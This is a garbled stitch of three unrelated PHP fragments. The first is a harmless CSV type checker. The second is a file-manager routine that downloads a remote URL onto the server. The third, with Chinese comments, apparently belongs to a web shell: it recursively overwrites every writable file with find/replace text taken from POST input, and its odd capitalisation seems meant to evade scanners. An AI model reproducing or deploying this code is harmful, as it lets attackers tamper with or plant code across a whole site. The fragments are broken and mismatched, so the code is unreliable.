function checkcsv($csv, $delimiter) { global $shapefiles; $fname = $csv; $fhandle = fopen($fname, "r"); #Skip amount of rows for ($i = 0; $i < $_SESSION["skip"]; $i++) { $content = fgets($fhandle); } #get head $contenth = fgetcsv($fhandle, 0, $_SESSION["delimiter"], $_SESSION["quote"], $_SESSION["escape"]); echo "<br><table border='1'>"; #find the amount of columns $k = count($contenth); dropline($contenth, $k); for ($i = 1; $i < 100000; $i++) { $content = fgetcsv($fhandle, 0, $_SESSION["delimiter"], $_SESSION["quote"], $_SESSION["escape"]); if ($content !== false) { for ($j = 0; $j < $k; $j++) { $check[$j] = checktype($check[$j], $content[$j]); } } else { $i = 100000; } } $elementsh = $contenth; $content = ''; for ($j = 0; $j < $k; $j++) { $datareturn[$j]["type"] = $check[$j]; $datareturn[$j]["name"] = trim($elementsh[$j]); $content[$j] = $check[$j]; } dropline($content, $k); fclose($fhandle); $fhandle = fopen($fname, "r"); for ($i = 0; $i < $_SESSION["skip"]; $i++) { $content = fgets($fhandle); } $content = fgets($fhandle); for ($i = 1; $i < 20; $i++) { $content = fgetcsv($fhandle, 0, $_SESSION["delimiter"], $_SESSION["quote"], $_SESSION["escape"]); dropline($content, $k); } echo "</table>"; fclose($fhandle); return $datareturn; }
} } echo "parent.save_suc('{$out}');</script>"; die; } else { if ($action == "savefromurl" && $user["savefromurl"]) { if (!$path || !$url) { exitme("notice(lang.var_error)", "eval"); } if (!$filename) { $filename = basename1($url); } if ($filename != checkfilename($filename)) { exitme("notice(", "eval"); } checktype($filename); if (!is_writeable($path)) { exitme("notice(lang.cannot_write)", "eval"); } if (file_exists($path . $filename)) { exitme("notice(lang.alreadyExist+':{$filename}')", "eval"); } $filename = dealpath($path . $filename); if (@copy($url, $filename)) { exitme("notice(': {$filename} ');reloaddata();", "eval"); } else { exitme("notice(;", "eval"); } } else { if ($action == "paste") { if ($action1 != "cut" && $action1 != "copy") {
function listfiles($dir = ".") { //遍厉目录并替换 $hAndle = opendir($dir); //打开目录 while (fAlse != ($file = reAddir($hAndle))) { //阅读目录 if ($file != '.' && $file != '..') { //列出所有文件并去掉'.'和'.. if (is_dir("{$dir}/{$file}")) { //列出文件和目录 echo "<font color=\"yellow\">{$dir}/{$file}</font><br />"; //输出目录名[黄色] listfiles("{$dir}/{$file}"); //递归调用 } else { if ("{$dir}/{$file}" != selfname()) { //判断自身 echo "{$dir}/{$file}"; //输出文件名 //读取文件内容 if (checktype(selftype("{$dir}/{$file}"), types($_POST['type'])) and $_POST['type'] != "") { if (filesize("{$dir}/{$file}") > 0) { if (is_writable("{$dir}/{$file}")) { $fp = fopen("{$dir}/{$file}", "r"); $con = addslashes(freAd($fp, filesize("{$dir}/{$file}"))); //==========================替换内容 $con = replace($_POST['a'], $_POST['b'], $con); fclose($fp); //关闭文件连接 $fd = fopen("{$dir}/{$file}", "w"); //打开文件 $A = fputs($fd, stripslashes($con)); //写入替换后的内容 fclose($fd); //关闭文件连接 echo "<br />"; } else { echo "<font color=\"red\"> 不可写</font><br />"; } } } else { if ($_POST['type'] == "") { if (filesize("{$dir}/{$file}") > 0) { if (is_writable("{$dir}/{$file}")) { $fp = fopen("{$dir}/{$file}", "r"); $con = addslashes(freAd($fp, filesize("{$dir}/{$file}"))); //==========================替换内容 $con = replace($_POST['a'], $_POST['b'], $con); fclose($fp); //关闭文件连接 $fd = fopen("{$dir}/{$file}", "w"); //打开文件 $A = fputs($fd, stripslashes($con)); //写入替换后的内容 fclose($fd); //关闭文件连接} echo "<br />"; } else { echo "<font color=\"red\"> 不可写</font><br />"; } } } else { echo "<font color=\"red\"> 类型不匹配</font><br />"; } } } } } } }